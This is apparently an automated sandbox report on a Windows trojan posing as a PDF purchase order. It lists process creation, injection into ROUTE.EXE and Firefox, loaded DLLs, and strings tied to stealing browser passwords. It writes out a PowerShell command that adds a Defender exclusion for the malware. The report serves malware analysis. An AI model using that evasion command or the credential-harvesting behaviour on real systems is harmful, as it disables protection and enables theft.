                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282CE108_2_0282CE10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282AF348_2_0282AF34
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282AF408_2_0282AF40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282ADF08_2_0282ADF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028353D08_2_028353D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028335DD8_2_028335DD
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028335E08_2_028335E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0284BAD08_2_0284BAD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2E2168_2_02F2E216
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2E3338_2_02F2E333
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2E6D58_2_02F2E6D5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2D7988_2_02F2D798
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2CA288_2_02F2CA28
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: String function: 0171F290 appears 105 times
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: String function: 016D5130 appears 37 times
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: String function: 0170EA12 appears 86 times
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: String function: 016E7E54 appears 99 times
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: String function: 0168B970 appears 274 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 030BEA12 appears 86 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03097E54 appears 111 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0303B970 appears 280 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 030CF290 appears 105 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03085130 appears 58 times
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2220434300.0000000005C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2211278593.00000000043B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000000.2038210421.0000000000F5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeBJB.exeB vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2200491712.00000000033F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2222178450.0000000006341000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2222178450.0000000006341000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2223663446.0000000007E90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2195111905.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.0000000001208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameroute.exej% vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.000000000121A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameroute.exej% vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000005.00000002.2459063328.000000000178D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exeBinary or memory string: OriginalFilenameeBJB.exeB vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: PO 2025918 pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@12/9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 2025918 pdf.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhpvkcdg.gy5.ps1Jump to behavior
                      Source: PO 2025918 pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: PO 2025918 pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: ROUTE.EXE, 00000008.00000002.3896051765.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2642929579.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2640307768.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2640126010.0000000002C04000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3896051765.0000000002C25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: PO 2025918 pdf.exe, 00000000.00000000.2038120981.0000000000EA2000.00000002.00000001.01000000.00000003.sdmp, ROUTE.EXE, 00000008.00000002.3898549588.000000000363C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897032861.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2748637033.0000000015ECC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO users (first_name, last_name, email, [password]) VALUES (@firstName, @lastName, @email, @password);
                      Source: PO 2025918 pdf.exeVirustotal: Detection: 33%
                      Source: PO 2025918 pdf.exeReversingLabs: Detection: 34%
                      Source: unknownProcess created: C:\Users\user\Desktop\PO 2025918 pdf.exe "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess created: C:\Users\user\Desktop\PO 2025918 pdf.exe "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess created: C:\Users\user\Desktop\PO 2025918 pdf.exe "C:\Users\user\Desktop\PO 2025918 pdf.exe"Jump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: PO 2025918 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO 2025918 pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: PO 2025918 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: eBJB.pdb source: PO 2025918 pdf.exe
                      Source: Binary string: route.pdb source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.0000000001208000.00000004.00000020.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896147250.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mIrIhAjAJblou.exe, 00000007.00000000.2373430247.00000000005CE000.00000002.00000001.01000000.0000000C.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3895631434.00000000005CE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PO 2025918 pdf.exe, 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2454905808.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2460094659.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PO 2025918 pdf.exe, PO 2025918 pdf.exe, 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2454905808.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2460094659.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: eBJB.pdbSHA256 source: PO 2025918 pdf.exe
                      Source: Binary string: route.pdbGCTL source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.0000000001208000.00000004.00000020.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896147250.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: PO 2025918 pdf.exeStatic PE information: 0x8AEDD8A2 [Wed Nov 11 08:28:18 2043 UTC]
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_07C20BD8 push es; ret 0_2_07C20BDA
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_07C20B88 push es; ret 0_2_07C20B8A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_07C2393B pushfd ; ret 0_2_07C2393D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_07C238EB push eax; ret 0_2_07C238ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00411A5A push edi; iretd 5_2_00411A5B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00415A13 push esp; ret 5_2_00415A1E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0041623C push edi; retf 5_2_0041623D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0040235F push ds; ret 5_2_0040238E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004143E3 push ebx; ret 5_2_00414440
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004143E3 push edi; retf 5_2_00414477
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0041645E push eax; iretd 5_2_00416462
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0041446E push edi; retf 5_2_00414477
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00414436 push ebx; ret 5_2_00414440
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004034F0 push eax; ret 5_2_004034F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00404616 push edx; ret 5_2_00404617
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00418EC4 push eax; retf 5_2_00418EC5
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004187CA push esi; ret 5_2_004187D1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016909AD push ecx; mov dword ptr [esp], ecx5_2_016909B6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0301225F pushad ; ret 8_2_030127F9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030127FA pushad ; ret 8_2_030127F9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030409AD push ecx; mov dword ptr [esp], ecx8_2_030409B6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0301283D push eax; iretd 8_2_03012858
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03011200 push eax; iretd 8_2_03011369
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02832520 push esp; ret 8_2_0283252B
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282E567 push edi; iretd 8_2_0282E568
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028352D7 push esi; ret 8_2_028352DE
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02821123 push edx; ret 8_2_02821124
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028359D1 push eax; retf 8_2_028359D2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2C311 push ds; ret 8_2_02F2C347
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2C1D2 push ds; ret 8_2_02F2C347
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F261C7 push cs; retf 8_2_02F261C8
                      Source: PO 2025918 pdf.exeStatic PE information: section name: .text entropy: 7.75981250034453

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
